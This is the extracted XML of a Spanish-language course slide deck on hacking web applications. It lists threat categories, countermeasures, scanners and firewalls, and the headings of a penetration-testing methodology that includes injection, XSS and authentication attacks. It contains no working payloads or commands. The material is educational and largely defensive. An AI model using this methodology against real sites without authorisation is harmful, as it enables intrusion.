              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ruptura de control de acceso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Mala configuración en la seguridad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Administración de sesión violado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Exploits de plataforma.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32135188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r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Solicitudes NO SSL deben ser redirigidas a sitios SSL, asegurarse que el certificado es válido.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Definir derechos de acceso a áreas protegidas en el sitio web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>No almacenar contraseñas en cookies en texto claro o con encriptación débil.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Configurar mecanismos de seguridad y apagar los servicios que no se utilizan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Realizar validación de valores de dominio, tipos y patrones en todos los datos de entrada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Validar de manera fuerte las entradas del usuario.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217182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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Acunetix Web Vulnerability Scanner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Falcove Web Vulnerability Scanner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Netsparker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>N-Stalker Web Application Security Scanner.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25537885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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Application Firewall: dotDefender, IBM AppScan, ServerDefender VP.</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35745823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Test de Intrusión a Aplicaciones Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Utilizado para identificar, analizar y reportar vulnerabilidades, validación de entradas, buffer overflows, SQL injection, salto de autenticación, ejecución de código, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>La mejor manera es conduciendo una serie de pruebas y metódicas pruebas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>- Identificación de puertos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>- Verificación de vulnerabilidades.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>- Corrección de vulnerabilidades.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1224131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 de Intrusión Aplicaciones Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35602068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37011" y="476672"/>
            <a:ext cx="7358636" cy="5976664"/>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3356537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Obtener Información</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9955373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612255" y="620688"/>
            <a:ext cx="7919491" cy="5616624"/>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20847369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sz="4800" dirty="0"/>
              <a:t>Testear la administración de la configuración</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13966697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57199" y="476648"/>
            <a:ext cx="8430287" cy="6048696"/>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5257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a las aplicaciones Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Referencias directas de objetos inseguros.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Insuficiente Protección de la capa de transporte.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Fallo en la restricción de acceso URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Almacenamiento criptográfico inseguro.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Cookie spoofing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ofuscación de aplicación.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ataques de protocolo DMZ.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Exploits de administración de seguridad.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="437313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Testear Autenticación</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3102344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403648" y="316983"/>
            <a:ext cx="6336704" cy="6224035"/>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40124005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Testear Administración de la Sesión</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41885329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403648" y="188640"/>
            <a:ext cx="6359190" cy="6192688"/>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23448564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Testear Autorización</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8170018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93388" y="869578"/>
            <a:ext cx="7393127" cy="5007693"/>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22508649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Testear Validación de Datos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40730301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323528" y="63629"/>
            <a:ext cx="8424936" cy="6749748"/>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56981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Testear DoS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2304783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337259" y="77953"/>
            <a:ext cx="4469482" cy="6702094"/>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921323981"/>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794</TotalTime>
  <Words>4944</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>361</Paragraphs>
  <Slides>104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104</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="108" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Microsoft New Tai Lue</vt:lpstr>
      <vt:lpstr>Blue-Grey-PowerPoint-Template</vt:lpstr>
      <vt:lpstr>13. Hackeando Aplicaciones Web</vt:lpstr>
      <vt:lpstr>Introducción</vt:lpstr>
      <vt:lpstr>Componentes de una aplicación Web</vt:lpstr>
      <vt:lpstr>Aplicaciones Web 2.0</vt:lpstr>
      <vt:lpstr>Pila de vulnerabilidad</vt:lpstr>
      <vt:lpstr>Vectores de ataque Web</vt:lpstr>
      <vt:lpstr>Amenazas a las aplicaciones Web</vt:lpstr>
      <vt:lpstr>Amenazas a las aplicaciones Web</vt:lpstr>
      <vt:lpstr>Amenazas a las aplicaciones Web</vt:lpstr>
      <vt:lpstr>Amenazas a las aplicaciones Web</vt:lpstr>
      <vt:lpstr>Entradas no válidas</vt:lpstr>
      <vt:lpstr>Consulta Modificada</vt:lpstr>
      <vt:lpstr>Manipulación de parámetros/formularios</vt:lpstr>
      <vt:lpstr>Manipulación de parámetros/formularios</vt:lpstr>
      <vt:lpstr>Directory Traversal</vt:lpstr>
      <vt:lpstr>Mala configuración de seguridad</vt:lpstr>
      <vt:lpstr>Mala configuración de seguridad</vt:lpstr>
      <vt:lpstr>Inyección de fallas</vt:lpstr>
      <vt:lpstr>Ataques SQL Injection</vt:lpstr>
      <vt:lpstr>Ataques de inyección de comandos</vt:lpstr>
      <vt:lpstr>Ataques de inyección de comandos</vt:lpstr>
      <vt:lpstr>¿Qué es inyección LDAP?</vt:lpstr>
      <vt:lpstr>¿Como trabaja la inyección LDAP?</vt:lpstr>
      <vt:lpstr>¿Como trabaja la inyección LDAP?</vt:lpstr>
      <vt:lpstr>Ataque de manipulación de campo escondido</vt:lpstr>
      <vt:lpstr>Ataques Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Ataque Cross-Site Request Rorgery (CSRF)</vt:lpstr>
      <vt:lpstr>Ataque DoS a las aplicaciones Web</vt:lpstr>
      <vt:lpstr>Ataque DoS a las aplicaciones Web</vt:lpstr>
      <vt:lpstr>Ataques Buffer Overflow</vt:lpstr>
      <vt:lpstr>Cookie/Session Poisoning</vt:lpstr>
      <vt:lpstr>Ataque de fijación de sesión</vt:lpstr>
      <vt:lpstr>Protección en la capa de transporte insuficiente</vt:lpstr>
      <vt:lpstr>Manipulación de errores inapropiados</vt:lpstr>
      <vt:lpstr>Almacenamiento criptográfico inseguro</vt:lpstr>
      <vt:lpstr>Autenticación roto y administración de sesión</vt:lpstr>
      <vt:lpstr>Redirecciones y renvíos inválidos</vt:lpstr>
      <vt:lpstr>Ataque a los servicios Web</vt:lpstr>
      <vt:lpstr>Pila de los servicios Web</vt:lpstr>
      <vt:lpstr>Pila de los servicios Web</vt:lpstr>
      <vt:lpstr>Ataque footprinting a los Servicios Web</vt:lpstr>
      <vt:lpstr>XML Poisoning a los servicios Web</vt:lpstr>
      <vt:lpstr>Metodología Hacking</vt:lpstr>
      <vt:lpstr>1. Footprinting Web Infraestructure</vt:lpstr>
      <vt:lpstr>Footprinting Web Infraestructure: Server Discovery </vt:lpstr>
      <vt:lpstr>Footprinting Web Infraestructure: Server Discovery</vt:lpstr>
      <vt:lpstr>Footprinting Web Infraestructure: Server Identification/Banner Grabbing </vt:lpstr>
      <vt:lpstr>Footprinting Web Infraestructure: Hidden Content Discovery</vt:lpstr>
      <vt:lpstr>Footprinting Web Infraestructure: Hidden Content Discovery</vt:lpstr>
      <vt:lpstr>2. Attack Web Servers</vt:lpstr>
      <vt:lpstr>3. Analize Web Applications</vt:lpstr>
      <vt:lpstr>3. Analize Web Applications</vt:lpstr>
      <vt:lpstr>4. Attack Authentication Mechanism</vt:lpstr>
      <vt:lpstr>4. Attack Authentication Mechanism</vt:lpstr>
      <vt:lpstr>4. Attack Authentication Mechanism</vt:lpstr>
      <vt:lpstr>4. Attack Authentication Mechanism</vt:lpstr>
      <vt:lpstr>4. Attack Authentication Mechanism</vt:lpstr>
      <vt:lpstr>4. Attack Authentication Mechanism</vt:lpstr>
      <vt:lpstr>5. Attack Authorization Schemes</vt:lpstr>
      <vt:lpstr>6. Attack Session Management Mechanism</vt:lpstr>
      <vt:lpstr>7. Perform Injection Attacks</vt:lpstr>
      <vt:lpstr>8. Attack Data Connectivity</vt:lpstr>
      <vt:lpstr>8. Attack Data Connectivity</vt:lpstr>
      <vt:lpstr>9. Attack Web App Client</vt:lpstr>
      <vt:lpstr>10. Attack Web Services</vt:lpstr>
      <vt:lpstr>Herramientas hacking Web</vt:lpstr>
      <vt:lpstr>Herramientas hacking Web</vt:lpstr>
      <vt:lpstr>Contramedidas.</vt:lpstr>
      <vt:lpstr>Contramedidas</vt:lpstr>
      <vt:lpstr>Contramedidas</vt:lpstr>
      <vt:lpstr>Contramedidas</vt:lpstr>
      <vt:lpstr>¿Cómo defenderse contra ataques SQL Injection?</vt:lpstr>
      <vt:lpstr>¿Cómo defenderse contra ataques SQL Injection?</vt:lpstr>
      <vt:lpstr>¿Cómo defenderse contra las fallas de inyección de comandos?</vt:lpstr>
      <vt:lpstr>¿Cómo defenderse contra ataques XSS?</vt:lpstr>
      <vt:lpstr>¿Cómo defenderse contra ataques XSS?</vt:lpstr>
      <vt:lpstr>¿Cómo defenderse contra ataques DoS?</vt:lpstr>
      <vt:lpstr>¿Cómo defenderse de los ataques de servicios Web?</vt:lpstr>
      <vt:lpstr>Contramedidas</vt:lpstr>
      <vt:lpstr>Contramedidas</vt:lpstr>
      <vt:lpstr>Herramientas de Seguridad</vt:lpstr>
      <vt:lpstr>Herramientas de Seguridad</vt:lpstr>
      <vt:lpstr>Test de Intrusión a Aplicaciones Web</vt:lpstr>
      <vt:lpstr>Test de Intrusión Aplicaciones Web</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Obtener Información</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Testear la administración de la configuración</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Testear Autenticación</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Testear Administración de la Sesión</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Testear Autorización</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Testear Validación de Datos</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Testear DoS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Testear Servicios Web</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Testear Ajax</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47</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-11-09T01:50:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-22T06:11:35Z</dcterms:modified>
</cp:coreProperties>
</file>